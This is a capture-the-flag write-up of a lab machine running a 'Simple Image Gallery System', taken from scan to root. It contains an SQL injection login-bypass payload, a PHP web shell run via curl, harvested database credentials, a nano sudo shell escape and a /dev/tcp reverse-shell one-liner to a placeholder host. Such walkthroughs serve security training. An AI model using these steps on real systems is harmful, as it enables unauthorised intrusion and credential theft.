
Enumeration

First I ran Nmap and found two open ports, 80 and 8080, which answers the first question about open ports.

# Nmap 7.92 scan initiated Sat Feb 12 22:32:01 2022 as: nmap -A -oN nmap-scan 10.10.112.90
Nmap scan report for 10.10.112.90
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Simple Image Gallery System
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 22:33:06 2022 -- 1 IP address (1 host up) scanned in 65.51 seconds

I opened port 80 in my browser and it served the default Apache page:

Then I opened the other port, 8080, which Nmap flagged as a potential open proxy; it redirected me to https://ip/gallery/, which has a login page:

Initial Access & Foothold

On the login page I tried SQLi with the payload admin ' or 1=1 limit 1-- +' and was logged in as administrator:
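To show why that payload works, here is an added example (not code from the Gallery box or from the Simple Image Gallery System). It models a string-concatenating login handler against an in-memory SQLite table and puts the parameterised version beside it; the query text, the table layout, the sample accounts and the md5() password hashing are all assumptions made for the demo, not something the page confirms about the real app.

```python
"""Added example: why  admin ' or 1=1 limit 1-- +'  logs you in as admin.

The real app is PHP/MySQL; an in-memory SQLite table stands in for it here.
The query text, table layout, accounts and md5() hashing are assumptions.
"""
import hashlib
import sqlite3

# The payload typed into the login form above, verbatim.
PAYLOAD = "admin ' or 1=1 limit 1-- +'"


def build_db():
    """Constructed sample data: an admin row first, then an ordinary user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    rows = [("admin", hashlib.md5(b"S3cretAdmin!").hexdigest()),
            ("mike", hashlib.md5(b"mikepass").hexdigest())]
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", rows)
    conn.commit()
    return conn


def vulnerable_query(username, password):
    """Builds the SQL the way a string-concatenating login handler would."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{pw_hash}'")


def login_vulnerable(conn, username, password):
    """User input becomes SQL: the quote closes the string literal,
    'or 1=1' matches every row, 'limit 1' keeps the first one (admin),
    and '-- ' turns the whole password check into a comment."""
    row = conn.execute(vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Same logic with bound parameters: the payload is compared as a
    literal username, which no row has, so the login fails."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    print("query sent to the DB:\n ", vulnerable_query(PAYLOAD, "x"))
    print("vulnerable login returns:", login_vulnerable(db, PAYLOAD, "x"))
    print("hardened login returns:  ", login_hardened(db, PAYLOAD, "x"))
```

Running it prints the exact statement the database sees, with everything after -- greyed out as a comment; the same payload returns admin from the concatenated query and nothing from the parameterised one.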

Looking around the dashboard I found an upload field in the profile settings, so I uploaded a file, captured the request, and edited the file contents into a simple web shell that runs the command passed in the 0 parameter (the upload landed in /gallery/uploads/ with a timestamp prefix on the name):

[tahaafarooq@urchinsec-lab gallery]$ curl "http://10.10.118.206/gallery/uploads/1644852240_shell.php?0=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now time to pop a reverse shell:

Now that I had a shell, I looked for configuration files and found config.php, but it only pulls in files from other folders:

<?php
ob_start();
ini_set('date.timezone','Asia/Manila');
date_default_timezone_set('Asia/Manila');
session_start();
require_once('initialize.php');
require_once('classes/DBConnection.php');
require_once('classes/SystemSettings.php');
$db = new DBConnection;
$conn = $db->conn;

DBConnection.php in the classes folder only reads the credentials from constants:

<?php
if(!defined('DB_SERVER')){
    require_once("../initialize.php");
}
class DBConnection{
    private $host = DB_SERVER;
    private $username = DB_USERNAME;
    private $password = DB_PASSWORD;
    private $database = DB_NAME;
    public $conn;

    public function __construct(){
        if (!isset($this->conn)) {
            $this->conn = new mysqli($this->host, $this->username, $this->password, $this->database);
            if (!$this->conn) {
                echo 'Cannot connect to database server';
                exit;
            }
        }
    }

    public function __destruct(){
        $this->conn->close();
    }
}
?>

so the actual values of those constants are defined in initialize.php:

<?php
$dev_data = array(
    'id'=>'-1',
    'firstname'=>'Developer',
    'lastname'=>'',
    'username'=>'dev_oretnom',
    'password'=>'5da283a2d990e8d8512cf967df5bc0d0',
    'last_login'=>'',
    'date_updated'=>'',
    'date_added'=>''
);
if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/");
if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
if(!defined('dev_data')) define('dev_data',$dev_data);
if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"passw0rd321");
if(!defined('DB_NAME')) define('DB_NAME',"gallery_db");
?>

That gave me the MySQL credentials, plus the $dev_data array, which looks like a built-in developer account (dev_oretnom) with its password stored as a hash. I answered question three by logging into MySQL with those credentials and copying the admin user's hash.

The first thing I did was upgrade to a full TTY so the shell stops throwing those terminal errors:

/usr/bin/script -qc /bin/bash /dev/null
# press Ctrl+Z to background the shell
stty raw -echo; fg
export TERM=xterm
www-data@gallery:/var/backups/mike_home_backup$ /usr/bin/script -qc /bin/bash /dev/null
<ome_backup$ /usr/bin/script -qc /bin/bash /dev/null
www-data@gallery:/var/backups/mike_home_backup$ ^Z
[1]+  Stopped                 nc -lnvp 1337
[tahaafarooq@urchinsec-lab urchinshell]$ stty raw -echo; fg
nc -lnvp 1337
             export TERM=xterm

With the shell upgraded, I looked through /var/backups and found a backup of mike's home folder. Reading his .bash_history gave me the password: it had been typed onto the end of a sudo -l command, so it ended up in the history:

www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -lb[REDACTED]x
clear
sudo -l
exit

I switched to mike with that password:

www-data@gallery:/var/backups/mike_home_backup$ su mike
Password: 
mike@gallery:/var/backups/mike_home_backup$ cd ~
mike@gallery:~$ ls
documents  images  user.txt
mike@gallery:~$ cat user.txt
THM{af05[REDACTED]46ef}

and there I got the user flag!

Privilege Escalation

First I ran sudo -l to see which commands mike can run as root:

mike@gallery:~$ sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh

Then I read /opt/rootkit.sh:

#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
  versioncheck)
    /usr/bin/rkhunter --versioncheck ;;
  update)
    /usr/bin/rkhunter --update;;
  list)
    /usr/bin/rkhunter --list;;
  read)
    /bin/nano /root/report.txt;;
  *)
    exit;;
esac

Choosing the read option opens /root/report.txt in nano, and because the script runs via sudo, nano runs as root. nano can spawn a shell, so that is the privilege escalation path:

From inside nano I get a root shell by typing the following (Ctrl+R opens the read-file prompt, Ctrl+X from there runs a command instead):

^R^X [control+R + control+X]
reset; sh 1>&0 2>&0

and from that shell I can run:

/bin/bash -c "bash -i &>/dev/tcp/tunip/port <&1"

Set up a listener on your machine beforehand and boom, you have a root shell:

[tahaafarooq@urchinsec-lab gallery]$ nc -lvnp 1122
Connection from 10.10.170.61:54522
root@gallery:~# id
id
uid=0(root) gid=0(root) groups=0(root)

And the root flag:

root@gallery:/# root
cd root
root@gallery:/root# ls
ls
report.txt
root.txt
root@gallery:/root# cat root.txt
cat root.txt
THM{ba87e0[REDACTED]fde87}

contact : tahaafarooq